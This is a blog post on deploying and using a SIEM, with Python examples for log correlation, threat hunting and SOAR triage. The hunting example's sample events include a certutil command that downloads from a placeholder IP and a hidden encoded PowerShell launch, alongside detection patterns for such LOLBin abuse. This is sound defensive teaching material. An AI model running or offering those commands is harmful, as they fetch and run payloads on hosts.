(A thought from The Matrix: Neo likely used a SIEM before he took the red pill and could see the matrix without one...)
One of the best ways to monitor security-related activity across your organization is to collect audit logs from every device, server, and application on the network and analyze those logs for activity that violates acceptable behavior. This is precisely the role of a SIEM (Security Information and Event Management) system.
Let me simplify your life by providing some best practice suggestions for deploying and using a SIEM.
When enterprise SIEM solutions started appearing in the early 2000s, the only option was to build them on servers in your data center. This was not a simple task: configuring and scaling a SIEM for high log ingestion rates carries a steep learning curve. On-prem SIEM solutions still exist, but many organizations are now moving to cloud-hosted SIEMs, which scale ingestion and query performance automatically and are operated for very high availability.
The largest cost of a cloud-based SIEM is ingestion. Collecting millions or even billions of events per day will quickly incur costs in the thousands of dollars. Choosing a solution that offers data summarization and alternate storage tiers can make a big difference in controlling those costs. For example, some SIEMs provide multi-tiered storage options such as:
Develop a process for prioritizing, collecting, parsing, correlating, and reporting your logs. Eighty percent of the effort in setting up a SIEM is configuring good logging.
A good SIEM provides out-of-the-box support for the most common log sources. This support includes data connectors for pulling in the logs, correlation rules for detecting threats and non-compliant activity, and dashboards and reports that give a broad visual summary of the activity in the logs.
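The parse-correlate-report pipeline described above, as an added worked example that is not code from the original post or from any particular SIEM product. It takes a handful of constructed sshd lines in syslog format (placeholder hosts, users and documentation-range IPs), normalizes them into events, then runs one classic correlation rule: a successful login from a source that produced at least `threshold` failures in the preceding `window_s` seconds. The rule name, field names and thresholds are assumptions chosen for the example, not a vendor's defaults.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines in syslog format (made up for this example; the
# hosts, users and IPs are documentation-range placeholders, not real data).
SAMPLE_LOG = """\
Mar  4 10:15:01 bastion sshd[2231]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Mar  4 10:15:03 bastion sshd[2231]: Failed password for invalid user admin from 203.0.113.7 port 51123 ssh2
Mar  4 10:15:05 bastion sshd[2231]: Failed password for root from 203.0.113.7 port 51124 ssh2
Mar  4 10:15:09 bastion sshd[2231]: Accepted password for deploy from 203.0.113.7 port 51130 ssh2
Mar  4 10:20:00 bastion sshd[2290]: Failed password for alice from 198.51.100.20 port 40001 ssh2
Mar  4 10:21:00 bastion sshd[2290]: Accepted publickey for alice from 198.51.100.20 port 40002 ssh2
Mar  4 11:00:00 bastion cron[3000]: (root) CMD (run-parts /etc/cron.hourly)
"""

# Step 1: parsing. The syslog envelope first, then the sshd-specific message body.
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[\w-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
SSHD_AUTH_RE = re.compile(
    r"^(?P<outcome>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)"
)

def parse_log(text, year=2024):
    """Turn raw lines into normalized auth events; non-auth lines are dropped."""
    events = []
    for line in text.splitlines():
        env = SYSLOG_RE.match(line)
        if not env or env["proc"] != "sshd":
            continue
        body = SSHD_AUTH_RE.match(env["msg"])
        if not body:
            continue
        # Syslog timestamps carry no year, so the caller supplies it (assumed 2024 here).
        ts = datetime.strptime(f"{year} {' '.join(env['ts'].split())}", "%Y %b %d %H:%M:%S")
        events.append({
            "ts": ts, "host": env["host"], "src": body["src"],
            "user": body["user"], "method": body["method"],
            "success": body["outcome"] == "Accepted",
        })
    return sorted(events, key=lambda e: e["ts"])

# Step 2: correlation. A success from a source that produced >= threshold
# failures inside the preceding window is the "failures then success" pattern
# typical of a brute-force or password-spray attempt that finally worked.
def correlate_bruteforce_success(events, threshold=3, window_s=60):
    recent_failures = defaultdict(deque)   # src -> timestamps of recent failures
    alerts = []
    for e in events:
        q = recent_failures[e["src"]]
        while q and (e["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()                    # expire failures that fell out of the window
        if not e["success"]:
            q.append(e["ts"])
            continue
        if len(q) >= threshold:
            alerts.append({
                "rule": "ssh_bruteforce_then_success",   # assumed rule name
                "src": e["src"], "user": e["user"], "host": e["host"],
                "failures_in_window": len(q), "ts": e["ts"].isoformat(),
            })
        q.clear()                          # a success resets the counter for that source

# Step 3: reporting. A SIEM would render this on a dashboard; here it is a
# plain one-line-per-alert summary the SOC can read.
    return alerts

def report(alerts):
    return [f"[{a['ts']}] {a['rule']}: {a['failures_in_window']} failures then "
            f"login as {a['user']} from {a['src']} on {a['host']}" for a in alerts]

if __name__ == "__main__":
    for line in report(correlate_bruteforce_success(parse_log(SAMPLE_LOG))):
        print(line)
```

On the sample data only the first source fires: three failures in eight seconds followed by an accepted password. The second source has a single failure before a key-based success and stays below the threshold, which is the point of keeping the window and threshold tunable rather than alerting on every failure.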
SIEMs often provide additional "metadata," which complements the information in the logs and provides better context for correlations to decide if malicious activity is occurring. Some examples are:
Threat hunting is a proactive (and sometimes reactive) method for investigating threat activity that the SIEM's correlation alerts may not surface on their own. An experienced SOC analyst can hunt manually, or semi-automatically by executing anywhere from a few to hundreds of pre-defined search queries. AI is also becoming a new tool in automated threat hunts (e.g. Microsoft's Copilot for Security).
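A small library of saved hunt queries run in batch, as an added example that is not from the original post or any product. The events are constructed, already-normalized records of the kind a SIEM search returns (made-up hosts, users, countries and command lines), and the per-user country baseline is likewise assumed. Each hunt is a plain predicate over the events; the last function pivots on the overlap between hunts, since a user/host pair that shows up in several independent hunts is the lead an analyst would chase first.

```python
from collections import Counter
from datetime import datetime

# Constructed, already-normalized events as a SIEM would hand them back from a
# search (made-up hosts, users and process names; not from any real environment).
EVENTS = [
    {"ts": "2024-03-04T09:12:00", "type": "logon",   "user": "alice", "host": "WS-01", "country": "US"},
    {"ts": "2024-03-04T13:40:00", "type": "logon",   "user": "bob",   "host": "WS-02", "country": "US"},
    {"ts": "2024-03-05T02:17:00", "type": "logon",   "user": "alice", "host": "WS-01", "country": "RO"},
    {"ts": "2024-03-04T09:15:00", "type": "process", "user": "alice", "host": "WS-01",
     "image": "outlook.exe", "cmd": "outlook.exe"},
    {"ts": "2024-03-04T13:42:00", "type": "process", "user": "bob",   "host": "WS-02",
     "image": "outlook.exe", "cmd": "outlook.exe"},
    {"ts": "2024-03-05T02:18:00", "type": "process", "user": "alice", "host": "WS-01",
     "image": "powershell.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ts": "2024-03-04T10:00:00", "type": "process", "user": "svc",   "host": "SRV-01",
     "image": "certutil.exe", "cmd": "certutil.exe -urlcache -split -f http://203.0.113.9/a.txt a.txt"},
]

# Assumed baseline from prior history: countries each user normally logs on from.
BASELINE_COUNTRIES = {"alice": {"US"}, "bob": {"US"}}

def hunt_offhours_logons(events, start_h=7, end_h=19):
    """Logons outside local business hours (hours are an assumption)."""
    return [e for e in events if e["type"] == "logon"
            and not start_h <= datetime.fromisoformat(e["ts"]).hour < end_h]

def hunt_new_country(events, baseline):
    """Logons from a country not in the user's historical baseline."""
    return [e for e in events if e["type"] == "logon"
            and e["country"] not in baseline.get(e["user"], set())]

def hunt_rare_process(events, max_hosts=1):
    """Process images seen on very few hosts fleet-wide; rarity itself is the signal."""
    hosts_per_image = {}
    for e in events:
        if e["type"] == "process":
            hosts_per_image.setdefault(e["image"], set()).add(e["host"])
    rare = {img for img, hosts in hosts_per_image.items() if len(hosts) <= max_hosts}
    return [e for e in events if e["type"] == "process" and e["image"] in rare]

def hunt_lolbin_download(events):
    """Living-off-the-land binaries used to fetch or decode payloads."""
    markers = (("certutil.exe", "-urlcache"), ("powershell.exe", "-enc"),
               ("bitsadmin.exe", "/transfer"))
    return [e for e in events if e["type"] == "process"
            and any(e["image"] == img and flag in e["cmd"] for img, flag in markers)]

# The "saved searches": name -> query. Adding a hunt is adding one entry here.
HUNT_LIBRARY = {
    "offhours_logon": lambda ev: hunt_offhours_logons(ev),
    "logon_new_country": lambda ev: hunt_new_country(ev, BASELINE_COUNTRIES),
    "rare_process_image": lambda ev: hunt_rare_process(ev),
    "lolbin_download_or_encoded": lambda ev: hunt_lolbin_download(ev),
}

def run_hunts(events, library=HUNT_LIBRARY):
    """Execute every saved hunt and return its hits keyed by hunt name."""
    return {name: query(events) for name, query in library.items()}

def pivot_on_hits(results):
    """Count how many hunts each (user, host) pair appears in; overlap is the lead."""
    c = Counter()
    for hits in results.values():
        for e in hits:
            c[(e["user"], e["host"])] += 1
    return c

if __name__ == "__main__":
    results = run_hunts(EVENTS)
    for name, hits in results.items():
        print(f"{name}: {len(hits)} hit(s)")
    print("top pivot:", pivot_on_hits(results).most_common(1))
```

None of these four hunts is a high-confidence detection on its own (off-hours logons and rare binaries are common in any fleet), which is exactly why they live in a hunt library rather than as alerting rules. Run together, they put alice on WS-01 in all four result sets, and that overlap is what turns a batch of weak signals into an investigation.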
Analyzing billions of logs per day and expecting perfect correlations with no false positives is unrealistic. This is where SOAR (Security Orchestration, Automation, and Response) comes in. Automation can be developed to take over the repetitive steps a SOC operator performs in the first stages of an investigation. In the past, many organizations found that developing SOAR workflows required significant effort and expertise; AI-assisted tooling is beginning to simplify building those automated investigation playbooks.
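A first-stage triage playbook of the kind SOAR automates, as an added example that is not code from the original post or any SOAR platform. The enrichment sources (threat intel, asset inventory, scanner allowlist, privileged-user list) are constructed inline dictionaries standing in for the API calls a real playbook would make; the scoring weights, severity cut-offs and action names are assumptions for the example. The alert shape matches a brute-force style alert with a source IP, host, user and failure count.

```python
import ipaddress

# Constructed enrichment sources a SOAR playbook would normally query over an
# API; they are inline here so the example runs offline. All values are made up.
THREAT_INTEL = {"203.0.113.7": {"tags": ["bruteforce", "tor-exit"], "score": 85}}
ASSET_INVENTORY = {
    "bastion": {"owner": "platform-team", "crown_jewel": True, "env": "prod"},
    "dev-01":  {"owner": "dev-team", "crown_jewel": False, "env": "dev"},
}
AUTHORIZED_SCANNERS = {"10.10.5.5"}            # assumed internal vuln-scanner allowlist
PRIVILEGED_USERS = {"deploy", "root", "admin"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def step_enrich(alert):
    """Step 1: the lookups an analyst does by hand on every alert, done once for them."""
    src = alert["src"]
    return {
        "src_internal": is_internal(src),
        "src_authorized_scanner": src in AUTHORIZED_SCANNERS,
        "threat_intel": THREAT_INTEL.get(src, {"tags": [], "score": 0}),
        "asset": ASSET_INVENTORY.get(alert["host"],
                                     {"owner": "unknown", "crown_jewel": False, "env": "unknown"}),
        "privileged_user": alert["user"] in PRIVILEGED_USERS,
    }

def step_score(alert, ctx):
    """Step 2: deterministic severity so identical alerts always get identical triage."""
    score = 0
    score += ctx["threat_intel"]["score"] // 2              # 0..50 from intel reputation
    score += 20 if ctx["asset"]["crown_jewel"] else 0       # what was targeted
    score += 15 if ctx["privileged_user"] else 0            # whose account
    score += 10 if not ctx["src_internal"] else 0           # external origin
    score += 5 * min(alert.get("failures_in_window", 0), 4)  # volume, capped
    return score

def step_decide(alert, ctx, score):
    """Step 3: route. Only the clear-cut branches are automated; the rest goes to a human."""
    if ctx["src_authorized_scanner"] and not alert.get("success"):
        return "auto_close", ["annotate:authorized scanner, no successful login"]
    if score >= 70:
        return "escalate_p1", ["block_ip:" + alert["src"], "page_oncall", "open_ticket"]
    if score >= 40:
        return "escalate_p3", ["open_ticket"]
    return "analyst_review", ["queue_for_review"]

def run_playbook(alert):
    """Run the three steps and return an audit record of what was decided and why."""
    ctx = step_enrich(alert)
    score = step_score(alert, ctx)
    decision, actions = step_decide(alert, ctx, score)
    return {"alert_id": alert["id"], "score": score, "decision": decision,
            "actions": actions, "context": ctx}

# Two constructed alerts: one is a real incident, one is authorized scanner noise.
ALERTS = [
    {"id": "A-1", "rule": "ssh_bruteforce_then_success", "src": "203.0.113.7",
     "host": "bastion", "user": "deploy", "failures_in_window": 3, "success": True},
    {"id": "A-2", "rule": "ssh_auth_failure_burst", "src": "10.10.5.5",
     "host": "dev-01", "user": "svc-scan", "failures_in_window": 12, "success": False},
]

if __name__ == "__main__":
    for a in ALERTS:
        r = run_playbook(a)
        print(a["id"], r["decision"], r["score"], r["actions"])
```

The value is not in any single lookup but in the fact that the enrichment, scoring and routing happen identically for every alert before a human looks at it, and that the returned record explains the decision. Note that the auto-close branch is deliberately narrow (allowlisted scanner and no successful login); anything ambiguous lands in the review queue rather than being closed by automation.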
A SIEM is one of the central tools of a Security Operations team. A strong understanding of log processing is required to both configure and operationalize one. AI is becoming a significant addition to the SOAR side of the SIEM, lowering the effort needed to build automated investigations.
About This Blog Series
Follow the full series here: Building Defenses with Modern Security Solutions
This series discusses a list of key cybersecurity defense topics. The full collection of posts and labs can be used as an educational tool for implementing cybersecurity defenses.
Labs
For quick walkthrough labs on the topics in this blog series, check out the story of “ZPM Incorporated” and their steps to implementing all the solutions discussed here.
Compliance
All topics mentioned in this series have been mapped to several compliance controls here.